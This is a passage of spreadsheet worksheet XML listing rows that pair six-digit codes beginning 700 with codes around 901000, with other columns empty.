      </c>
      <c r="B6208" s="3">
        <v>901087.00199999998</v>
      </c>
      <c r="D6208" s="5"/>
      <c r="E6208" s="3"/>
      <c r="F6208" s="1"/>
      <c r="H6208" s="1"/>
    </row>
    <row r="6209" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6209" s="5">
        <v>700516</v>
      </c>
      <c r="B6209" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6209" s="5"/>
      <c r="E6209" s="3"/>
      <c r="F6209" s="1"/>
      <c r="H6209" s="1"/>
    </row>
    <row r="6210" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6210" s="5">
        <v>700516</v>
      </c>
      <c r="B6210" s="3">
        <v>901140</v>
      </c>
      <c r="D6210" s="5"/>
      <c r="E6210" s="3"/>
      <c r="F6210" s="1"/>
      <c r="H6210" s="1"/>
    </row>
    <row r="6211" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6211" s="5">
        <v>700516</v>
      </c>
      <c r="B6211" s="3">
        <v>901190</v>
      </c>
      <c r="D6211" s="5"/>
      <c r="E6211" s="3"/>
      <c r="F6211" s="1"/>
      <c r="H6211" s="1"/>
    </row>
    <row r="6212" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6212" s="5">
        <v>700516</v>
      </c>
      <c r="B6212" s="3">
        <v>901083</v>
      </c>
      <c r="D6212" s="5"/>
      <c r="E6212" s="3"/>
      <c r="F6212" s="1"/>
      <c r="H6212" s="1"/>
    </row>
    <row r="6213" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6213" s="5">
        <v>700516</v>
      </c>
      <c r="B6213" s="3">
        <v>901105</v>
      </c>
      <c r="D6213" s="5"/>
      <c r="E6213" s="3"/>
      <c r="F6213" s="1"/>
      <c r="H6213" s="1"/>
    </row>
    <row r="6214" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6214" s="5">
        <v>700516</v>
      </c>
      <c r="B6214" s="3">
        <v>901027</v>
      </c>
      <c r="D6214" s="5"/>
      <c r="E6214" s="3"/>
      <c r="F6214" s="1"/>
      <c r="H6214" s="1"/>
    </row>
    <row r="6215" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6215" s="5">
        <v>700516</v>
      </c>
      <c r="B6215" s="3">
        <v>901069.00199999998</v>
      </c>
      <c r="D6215" s="5"/>
      <c r="E6215" s="3"/>
      <c r="F6215" s="1"/>
      <c r="H6215" s="1"/>
    </row>
    <row r="6216" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6216" s="5">
        <v>700516</v>
      </c>
      <c r="B6216" s="3">
        <v>901057</v>
      </c>
      <c r="D6216" s="5"/>
      <c r="E6216" s="3"/>
      <c r="F6216" s="1"/>
      <c r="H6216" s="1"/>
    </row>
    <row r="6217" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6217" s="5">
        <v>700516</v>
      </c>
      <c r="B6217" s="3">
        <v>901053.005</v>
      </c>
      <c r="D6217" s="5"/>
      <c r="E6217" s="3"/>
      <c r="F6217" s="1"/>
      <c r="H6217" s="1"/>
    </row>
    <row r="6218" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6218" s="5">
        <v>700516</v>
      </c>
      <c r="B6218" s="3">
        <v>901082</v>
      </c>
      <c r="D6218" s="5"/>
      <c r="E6218" s="3"/>
      <c r="F6218" s="1"/>
      <c r="H6218" s="1"/>
    </row>
    <row r="6219" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6219" s="5">
        <v>700516</v>
      </c>
      <c r="B6219" s="3">
        <v>901016</v>
      </c>
      <c r="D6219" s="5"/>
      <c r="E6219" s="3"/>
      <c r="F6219" s="1"/>
      <c r="H6219" s="1"/>
    </row>
    <row r="6220" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6220" s="5">
        <v>700157</v>
      </c>
      <c r="B6220" s="3">
        <v>901071.00399999996</v>
      </c>
      <c r="D6220" s="5"/>
      <c r="E6220" s="3"/>
      <c r="F6220" s="1"/>
      <c r="H6220" s="1"/>
    </row>
    <row r="6221" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6221" s="5">
        <v>700157</v>
      </c>
      <c r="B6221" s="3">
        <v>901010</v>
      </c>
      <c r="D6221" s="5"/>
      <c r="E6221" s="3"/>
      <c r="F6221" s="1"/>
      <c r="H6221" s="1"/>
    </row>
    <row r="6222" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6222" s="5">
        <v>700157</v>
      </c>
      <c r="B6222" s="3">
        <v>901083</v>
      </c>
      <c r="D6222" s="5"/>
      <c r="E6222" s="3"/>
      <c r="F6222" s="1"/>
      <c r="H6222" s="1"/>
    </row>
    <row r="6223" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6223" s="5">
        <v>700157</v>
      </c>
      <c r="B6223" s="3">
        <v>901112</v>
      </c>
      <c r="D6223" s="5"/>
      <c r="E6223" s="3"/>
      <c r="F6223" s="1"/>
      <c r="H6223" s="1"/>
    </row>
    <row r="6224" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6224" s="5">
        <v>700157</v>
      </c>
      <c r="B6224" s="3">
        <v>901082</v>
      </c>
      <c r="D6224" s="5"/>
      <c r="E6224" s="3"/>
      <c r="F6224" s="1"/>
      <c r="H6224" s="1"/>
    </row>
    <row r="6225" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6225" s="5">
        <v>700035</v>
      </c>
      <c r="B6225" s="3">
        <v>901560.00300000003</v>
      </c>
      <c r="D6225" s="5"/>
      <c r="E6225" s="3"/>
      <c r="F6225" s="1"/>
      <c r="H6225" s="1"/>
    </row>
    <row r="6226" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6226" s="5">
        <v>700035</v>
      </c>
      <c r="B6226" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D6226" s="5"/>
      <c r="E6226" s="3"/>
      <c r="F6226" s="1"/>
      <c r="H6226" s="1"/>
    </row>
    <row r="6227" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6227" s="5">
        <v>700035</v>
      </c>
      <c r="B6227" s="3">
        <v>901547.00899999996</v>
      </c>
      <c r="D6227" s="5"/>
      <c r="E6227" s="3"/>
      <c r="F6227" s="1"/>
      <c r="H6227" s="1"/>
    </row>
    <row r="6228" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6228" s="5">
        <v>700035</v>
      </c>
      <c r="B6228" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D6228" s="5"/>
      <c r="E6228" s="3"/>
      <c r="F6228" s="1"/>
      <c r="H6228" s="1"/>
    </row>
    <row r="6229" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6229" s="5">
        <v>700035</v>
      </c>
      <c r="B6229" s="3">
        <v>901052.00100000005</v>
      </c>
      <c r="D6229" s="5"/>
      <c r="E6229" s="3"/>
      <c r="F6229" s="1"/>
      <c r="H6229" s="1"/>
    </row>
    <row r="6230" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6230" s="5">
        <v>700035</v>
      </c>
      <c r="B6230" s="3">
        <v>901083</v>
      </c>
      <c r="D6230" s="5"/>
      <c r="E6230" s="3"/>
      <c r="F6230" s="1"/>
      <c r="H6230" s="1"/>
    </row>
    <row r="6231" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6231" s="5">
        <v>700543</v>
      </c>
      <c r="B6231" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6231" s="5"/>
      <c r="E6231" s="3"/>
      <c r="F6231" s="1"/>
      <c r="H6231" s="1"/>
    </row>
    <row r="6232" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6232" s="5">
        <v>700543</v>
      </c>
      <c r="B6232" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D6232" s="5"/>
      <c r="E6232" s="3"/>
      <c r="F6232" s="1"/>
      <c r="H6232" s="1"/>
    </row>
    <row r="6233" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6233" s="5">
        <v>700543</v>
      </c>
      <c r="B6233" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D6233" s="5"/>
      <c r="E6233" s="3"/>
      <c r="F6233" s="1"/>
      <c r="H6233" s="1"/>
    </row>
    <row r="6234" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6234" s="5">
        <v>700543</v>
      </c>
      <c r="B6234" s="3">
        <v>901140</v>
      </c>
      <c r="D6234" s="5"/>
      <c r="E6234" s="3"/>
      <c r="F6234" s="1"/>
      <c r="H6234" s="1"/>
    </row>
    <row r="6235" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6235" s="5">
        <v>700543</v>
      </c>
      <c r="B6235" s="3">
        <v>901041</v>
      </c>
      <c r="D6235" s="5"/>
      <c r="E6235" s="3"/>
      <c r="F6235" s="1"/>
      <c r="H6235" s="1"/>
    </row>
    <row r="6236" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6236" s="5">
        <v>700543</v>
      </c>
      <c r="B6236" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D6236" s="5"/>
      <c r="E6236" s="3"/>
      <c r="F6236" s="1"/>
      <c r="H6236" s="1"/>
    </row>
    <row r="6237" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6237" s="5">
        <v>700543</v>
      </c>
      <c r="B6237" s="3">
        <v>901082</v>
      </c>
      <c r="D6237" s="5"/>
      <c r="E6237" s="3"/>
      <c r="F6237" s="1"/>
      <c r="H6237" s="1"/>
    </row>
    <row r="6238" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6238" s="5">
        <v>700543</v>
      </c>
      <c r="B6238" s="3">
        <v>901614.00100000005</v>
      </c>
      <c r="D6238" s="5"/>
      <c r="E6238" s="3"/>
      <c r="F6238" s="1"/>
      <c r="H6238" s="1"/>
    </row>
    <row r="6239" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6239" s="5">
        <v>700543</v>
      </c>
      <c r="B6239" s="3">
        <v>901033</v>
      </c>
      <c r="D6239" s="5"/>
      <c r="E6239" s="3"/>
      <c r="F6239" s="1"/>
      <c r="H6239" s="1"/>
    </row>
    <row r="6240" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6240" s="5">
        <v>700543</v>
      </c>
      <c r="B6240" s="3">
        <v>901497.00199999998</v>
      </c>
      <c r="D6240" s="5"/>
      <c r="E6240" s="3"/>
      <c r="F6240" s="1"/>
      <c r="H6240" s="1"/>
    </row>
    <row r="6241" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6241" s="5">
        <v>700374</v>
      </c>
      <c r="B6241" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6241" s="5"/>
      <c r="E6241" s="3"/>
      <c r="F6241" s="1"/>
      <c r="H6241" s="1"/>
    </row>
    <row r="6242" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6242" s="5">
        <v>700374</v>
      </c>
      <c r="B6242" s="3">
        <v>901110.00100000005</v>
      </c>
      <c r="D6242" s="5"/>
      <c r="E6242" s="3"/>
      <c r="F6242" s="1"/>
      <c r="H6242" s="1"/>
    </row>
    <row r="6243" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6243" s="5">
        <v>700374</v>
      </c>
      <c r="B6243" s="3">
        <v>901059</v>
      </c>
      <c r="D6243" s="5"/>
      <c r="E6243" s="3"/>
      <c r="F6243" s="1"/>
      <c r="H6243" s="1"/>
    </row>
    <row r="6244" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6244" s="5">
        <v>700374</v>
      </c>
      <c r="B6244" s="3">
        <v>901059.00600000005</v>
      </c>
      <c r="D6244" s="5"/>
      <c r="E6244" s="3"/>
      <c r="F6244" s="1"/>
      <c r="H6244" s="1"/>
    </row>
    <row r="6245" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6245" s="5">
        <v>700374</v>
      </c>
      <c r="B6245" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D6245" s="5"/>
      <c r="E6245" s="3"/>
      <c r="F6245" s="1"/>
      <c r="H6245" s="1"/>
    </row>
    <row r="6246" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6246" s="5">
        <v>700374</v>
      </c>
      <c r="B6246" s="3">
        <v>901203</v>
      </c>
      <c r="D6246" s="5"/>
      <c r="E6246" s="3"/>
      <c r="F6246" s="1"/>
      <c r="H6246" s="1"/>
    </row>
    <row r="6247" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6247" s="5">
        <v>700374</v>
      </c>
      <c r="B6247" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D6247" s="5"/>
      <c r="E6247" s="3"/>
      <c r="F6247" s="1"/>
      <c r="H6247" s="1"/>
    </row>
    <row r="6248" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6248" s="5">
        <v>700374</v>
      </c>
      <c r="B6248" s="3">
        <v>901105</v>
      </c>
      <c r="D6248" s="5"/>
      <c r="E6248" s="3"/>
      <c r="F6248" s="1"/>
      <c r="H6248" s="1"/>
    </row>
    <row r="6249" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6249" s="5">
        <v>700374</v>
      </c>
      <c r="B6249" s="3">
        <v>901046</v>
      </c>
      <c r="D6249" s="5"/>
      <c r="E6249" s="3"/>
      <c r="F6249" s="1"/>
      <c r="H6249" s="1"/>
    </row>
    <row r="6250" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6250" s="5">
        <v>700374</v>
      </c>
      <c r="B6250" s="3">
        <v>901027</v>
      </c>
      <c r="D6250" s="5"/>
      <c r="E6250" s="3"/>
      <c r="F6250" s="1"/>
      <c r="H6250" s="1"/>
    </row>
    <row r="6251" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6251" s="5">
        <v>700374</v>
      </c>
      <c r="B6251" s="3">
        <v>901053.00300000003</v>
      </c>
      <c r="D6251" s="5"/>
      <c r="E6251" s="3"/>
      <c r="F6251" s="1"/>
      <c r="H6251" s="1"/>
    </row>
    <row r="6252" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6252" s="5">
        <v>700374</v>
      </c>
      <c r="B6252" s="3">
        <v>901082</v>
      </c>
      <c r="D6252" s="5"/>
      <c r="E6252" s="3"/>
      <c r="F6252" s="1"/>
      <c r="H6252" s="1"/>
    </row>
    <row r="6253" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6253" s="5">
        <v>700374</v>
      </c>
      <c r="B6253" s="3">
        <v>901016</v>
      </c>
      <c r="D6253" s="5"/>
      <c r="E6253" s="3"/>
      <c r="F6253" s="1"/>
      <c r="H6253" s="1"/>
    </row>
    <row r="6254" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6254" s="5">
        <v>700374</v>
      </c>
      <c r="B6254" s="3">
        <v>901049</v>
      </c>
      <c r="D6254" s="5"/>
      <c r="E6254" s="3"/>
      <c r="F6254" s="1"/>
      <c r="H6254" s="1"/>
    </row>
    <row r="6255" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6255" s="5">
        <v>700374</v>
      </c>
      <c r="B6255" s="3">
        <v>901033</v>
      </c>
      <c r="D6255" s="5"/>
      <c r="E6255" s="3"/>
      <c r="F6255" s="1"/>
      <c r="H6255" s="1"/>
    </row>
    <row r="6256" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6256" s="5">
        <v>700646</v>
      </c>
      <c r="B6256" s="3">
        <v>901059.00699999998</v>
      </c>
      <c r="D6256" s="5"/>
      <c r="E6256" s="3"/>
      <c r="F6256" s="1"/>
      <c r="H6256" s="1"/>
    </row>
    <row r="6257" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6257" s="5">
        <v>700646</v>
      </c>
      <c r="B6257" s="3">
        <v>901005</v>
      </c>
      <c r="D6257" s="5"/>
      <c r="E6257" s="3"/>
      <c r="F6257" s="1"/>
      <c r="H6257" s="1"/>
    </row>
    <row r="6258" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6258" s="5">
        <v>700646</v>
      </c>
      <c r="B6258" s="3">
        <v>901105</v>
      </c>
      <c r="D6258" s="5"/>
      <c r="E6258" s="3"/>
      <c r="F6258" s="1"/>
      <c r="H6258" s="1"/>
    </row>
    <row r="6259" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6259" s="5">
        <v>700646</v>
      </c>
      <c r="B6259" s="3">
        <v>901566.00199999998</v>
      </c>
      <c r="D6259" s="5"/>
      <c r="E6259" s="3"/>
      <c r="F6259" s="1"/>
      <c r="H6259" s="1"/>
    </row>
    <row r="6260" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6260" s="5">
        <v>700646</v>
      </c>
      <c r="B6260" s="3">
        <v>901018</v>
      </c>
      <c r="D6260" s="5"/>
      <c r="E6260" s="3"/>
      <c r="F6260" s="1"/>
      <c r="H6260" s="1"/>
    </row>
    <row r="6261" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6261" s="5">
        <v>700646</v>
      </c>
      <c r="B6261" s="3">
        <v>901518</v>
      </c>
      <c r="D6261" s="5"/>
      <c r="E6261" s="3"/>
      <c r="F6261" s="1"/>
      <c r="H6261" s="1"/>
    </row>
    <row r="6262" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6262" s="5">
        <v>700646</v>
      </c>
      <c r="B6262" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D6262" s="5"/>
      <c r="E6262" s="3"/>
      <c r="F6262" s="1"/>
      <c r="H6262" s="1"/>
    </row>
    <row r="6263" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6263" s="5">
        <v>700646</v>
      </c>
      <c r="B6263" s="3">
        <v>901553.00199999998</v>
      </c>
      <c r="D6263" s="5"/>
      <c r="E6263" s="3"/>
      <c r="F6263" s="1"/>
      <c r="H6263" s="1"/>
    </row>
    <row r="6264" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6264" s="5">
        <v>700646</v>
      </c>
      <c r="B6264" s="3">
        <v>901082</v>
      </c>
      <c r="D6264" s="5"/>
      <c r="E6264" s="3"/>
      <c r="F6264" s="1"/>
      <c r="H6264" s="1"/>
    </row>
    <row r="6265" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6265" s="5">
        <v>700646</v>
      </c>
      <c r="B6265" s="3">
        <v>901016</v>
      </c>
      <c r="D6265" s="5"/>
      <c r="E6265" s="3"/>
      <c r="F6265" s="1"/>
      <c r="H6265" s="1"/>
    </row>
    <row r="6266" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6266" s="5">
        <v>700646</v>
      </c>
      <c r="B6266" s="3">
        <v>901204.00100000005</v>
      </c>
      <c r="D6266" s="5"/>
      <c r="E6266" s="3"/>
      <c r="F6266" s="1"/>
      <c r="H6266" s="1"/>
    </row>
    <row r="6267" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6267" s="5">
        <v>700227</v>
      </c>
      <c r="B6267" s="3">
        <v>901213.00199999998</v>
      </c>
      <c r="D6267" s="5"/>
      <c r="E6267" s="3"/>
      <c r="F6267" s="1"/>
      <c r="H6267" s="1"/>
    </row>
    <row r="6268" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6268" s="5">
        <v>700324</v>
      </c>
      <c r="B6268" s="3">
        <v>901433</v>
      </c>
      <c r="D6268" s="5"/>
      <c r="E6268" s="3"/>
      <c r="F6268" s="1"/>
      <c r="H6268" s="1"/>
    </row>
    <row r="6269" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6269" s="5">
        <v>700324</v>
      </c>
      <c r="B6269" s="3">
        <v>901432</v>
      </c>
      <c r="D6269" s="5"/>
      <c r="E6269" s="3"/>
      <c r="F6269" s="1"/>
      <c r="H6269" s="1"/>
    </row>
    <row r="6270" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6270" s="5">
        <v>700324</v>
      </c>
      <c r="B6270" s="3">
        <v>901409</v>
      </c>
      <c r="D6270" s="5"/>
      <c r="E6270" s="3"/>
      <c r="F6270" s="1"/>
      <c r="H6270" s="1"/>
    </row>
    <row r="6271" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6271" s="5">
        <v>700324</v>
      </c>
      <c r="B6271" s="3">
        <v>901438</v>
      </c>
      <c r="D6271" s="5"/>
      <c r="E6271" s="3"/>
      <c r="F6271" s="1"/>
      <c r="H6271" s="1"/>
    </row>
    <row r="6272" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6272" s="5">
        <v>700324</v>
      </c>
      <c r="B6272" s="3">
        <v>901402</v>
      </c>
      <c r="D6272" s="5"/>
      <c r="E6272" s="3"/>
      <c r="F6272" s="1"/>
      <c r="H6272" s="1"/>
    </row>
    <row r="6273" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6273" s="5">
        <v>700324</v>
      </c>
      <c r="B6273" s="3">
        <v>901429</v>
      </c>
      <c r="D6273" s="5"/>
      <c r="E6273" s="3"/>
      <c r="F6273" s="1"/>
      <c r="H6273" s="1"/>
    </row>
    <row r="6274" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6274" s="5">
        <v>700324</v>
      </c>
      <c r="B6274" s="3">
        <v>901512</v>
      </c>
      <c r="D6274" s="5"/>
      <c r="E6274" s="3"/>
      <c r="F6274" s="1"/>
      <c r="H6274" s="1"/>
    </row>
    <row r="6275" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6275" s="5">
        <v>700324</v>
      </c>
      <c r="B6275" s="3">
        <v>901412</v>
      </c>
      <c r="D6275" s="5"/>
      <c r="E6275" s="3"/>
      <c r="F6275" s="1"/>
      <c r="H6275" s="1"/>
    </row>
    <row r="6276" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6276" s="5">
        <v>700324</v>
      </c>
      <c r="B6276" s="3">
        <v>901407</v>
      </c>
      <c r="D6276" s="5"/>
      <c r="E6276" s="3"/>
      <c r="F6276" s="1"/>
      <c r="H6276" s="1"/>
    </row>
    <row r="6277" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6277" s="5">
        <v>700324</v>
      </c>
      <c r="B6277" s="3">
        <v>901404</v>
      </c>
      <c r="D6277" s="5"/>
      <c r="E6277" s="3"/>
      <c r="F6277" s="1"/>
      <c r="H6277" s="1"/>
    </row>
    <row r="6278" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6278" s="5">
        <v>700324</v>
      </c>
      <c r="B6278" s="3">
        <v>901430</v>
      </c>
      <c r="D6278" s="5"/>
      <c r="E6278" s="3"/>
      <c r="F6278" s="1"/>
      <c r="H6278" s="1"/>
    </row>
    <row r="6279" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6279" s="5">
        <v>700324</v>
      </c>
      <c r="B6279" s="3">
        <v>901400</v>
      </c>
      <c r="D6279" s="5"/>
      <c r="E6279" s="3"/>
      <c r="F6279" s="1"/>
      <c r="H6279" s="1"/>
    </row>
    <row r="6280" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6280" s="5">
        <v>700324</v>
      </c>
      <c r="B6280" s="3">
        <v>901513</v>
      </c>
      <c r="D6280" s="5"/>
      <c r="E6280" s="3"/>
      <c r="F6280" s="1"/>
      <c r="H6280" s="1"/>
    </row>
    <row r="6281" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6281" s="5">
        <v>700324</v>
      </c>
      <c r="B6281" s="3">
        <v>901422</v>
      </c>
      <c r="D6281" s="5"/>
      <c r="E6281" s="3"/>
      <c r="F6281" s="1"/>
      <c r="H6281" s="1"/>
    </row>
    <row r="6282" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6282" s="5">
        <v>700305</v>
      </c>
      <c r="B6282" s="3">
        <v>901432</v>
      </c>
      <c r="D6282" s="5"/>
      <c r="E6282" s="3"/>
      <c r="F6282" s="1"/>
      <c r="H6282" s="1"/>
    </row>
    <row r="6283" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6283" s="5">
        <v>700305</v>
      </c>
      <c r="B6283" s="3">
        <v>901402</v>
      </c>
      <c r="D6283" s="5"/>
      <c r="E6283" s="3"/>
      <c r="F6283" s="1"/>
      <c r="H6283" s="1"/>
    </row>
    <row r="6284" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6284" s="5">
        <v>700305</v>
      </c>
      <c r="B6284" s="3">
        <v>901429</v>
      </c>
      <c r="D6284" s="5"/>
      <c r="E6284" s="3"/>
      <c r="F6284" s="1"/>
      <c r="H6284" s="1"/>
    </row>
    <row r="6285" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6285" s="5">
        <v>700305</v>
      </c>
      <c r="B6285" s="3">
        <v>901412</v>
      </c>
      <c r="D6285" s="5"/>
      <c r="E6285" s="3"/>
      <c r="F6285" s="1"/>
      <c r="H6285" s="1"/>
    </row>
    <row r="6286" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6286" s="5">
        <v>700305</v>
      </c>
      <c r="B6286" s="3">
        <v>901533</v>
      </c>
      <c r="D6286" s="5"/>
      <c r="E6286" s="3"/>
      <c r="F6286" s="1"/>
      <c r="H6286" s="1"/>
    </row>
    <row r="6287" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6287" s="5">
        <v>700305</v>
      </c>
      <c r="B6287" s="3">
        <v>901430</v>
      </c>
      <c r="D6287" s="5"/>
      <c r="E6287" s="3"/>
      <c r="F6287" s="1"/>
      <c r="H6287" s="1"/>
    </row>
    <row r="6288" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6288" s="5">
        <v>700225</v>
      </c>
      <c r="B6288" s="3">
        <v>901190</v>
      </c>
      <c r="D6288" s="5"/>
      <c r="E6288" s="3"/>
      <c r="F6288" s="1"/>
      <c r="H6288" s="1"/>
    </row>
    <row r="6289" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6289" s="5">
        <v>700390</v>
      </c>
      <c r="B6289" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D6289" s="5"/>
      <c r="E6289" s="3"/>
      <c r="F6289" s="1"/>
      <c r="H6289" s="1"/>
    </row>
    <row r="6290" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6290" s="5">
        <v>700390</v>
      </c>
      <c r="B6290" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D6290" s="5"/>
      <c r="E6290" s="3"/>
      <c r="F6290" s="1"/>
      <c r="H6290" s="1"/>
    </row>
    <row r="6291" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6291" s="5">
        <v>700390</v>
      </c>
      <c r="B6291" s="3">
        <v>901140</v>
      </c>
      <c r="D6291" s="5"/>
      <c r="E6291" s="3"/>
      <c r="F6291" s="1"/>
      <c r="H6291" s="1"/>
    </row>
    <row r="6292" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6292" s="5">
        <v>700390</v>
      </c>
      <c r="B6292" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D6292" s="5"/>
      <c r="E6292" s="3"/>
      <c r="F6292" s="1"/>
      <c r="H6292" s="1"/>
    </row>
    <row r="6293" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6293" s="5">
        <v>700390</v>
      </c>
      <c r="B6293" s="3">
        <v>901105</v>
      </c>
      <c r="D6293" s="5"/>
      <c r="E6293" s="3"/>
      <c r="F6293" s="1"/>
      <c r="H6293" s="1"/>
    </row>
    <row r="6294" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6294" s="5">
        <v>700390</v>
      </c>
      <c r="B6294" s="3">
        <v>901027</v>
      </c>
      <c r="D6294" s="5"/>
      <c r="E6294" s="3"/>
      <c r="F6294" s="1"/>
      <c r="H6294" s="1"/>
    </row>
    <row r="6295" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6295" s="5">
        <v>700390</v>
      </c>
      <c r="B6295" s="3">
        <v>901053.005</v>
      </c>
      <c r="D6295" s="5"/>
      <c r="E6295" s="3"/>
      <c r="F6295" s="1"/>
      <c r="H6295" s="1"/>
    </row>
    <row r="6296" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6296" s="5">
        <v>700390</v>
      </c>
      <c r="B6296" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D6296" s="5"/>
      <c r="E6296" s="3"/>
      <c r="F6296" s="1"/>
      <c r="H6296" s="1"/>
    </row>
    <row r="6297" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6297" s="5">
        <v>700058</v>
      </c>
      <c r="B6297" s="3">
        <v>901134</v>
      </c>
      <c r="D6297" s="5"/>
      <c r="E6297" s="3"/>
      <c r="F6297" s="1"/>
      <c r="H6297" s="1"/>
    </row>
    <row r="6298" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6298" s="5">
        <v>700058</v>
      </c>
      <c r="B6298" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D6298" s="5"/>
      <c r="E6298" s="3"/>
      <c r="F6298" s="1"/>
      <c r="H6298" s="1"/>
    </row>
    <row r="6299" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6299" s="5">
        <v>700058</v>
      </c>
      <c r="B6299" s="3">
        <v>901547.00899999996</v>
      </c>
      <c r="D6299" s="5"/>
      <c r="E6299" s="3"/>
      <c r="F6299" s="1"/>
      <c r="H6299" s="1"/>
    </row>
    <row r="6300" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6300" s="5">
        <v>700058</v>
      </c>
      <c r="B6300" s="3">
        <v>901008</v>
      </c>
      <c r="D6300" s="5"/>
      <c r="E6300" s="3"/>
      <c r="F6300" s="1"/>
      <c r="H6300" s="1"/>
    </row>
    <row r="6301" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6301" s="5">
        <v>700058</v>
      </c>
      <c r="B6301" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D6301" s="5"/>
      <c r="E6301" s="3"/>
      <c r="F6301" s="1"/>
      <c r="H6301" s="1"/>
    </row>
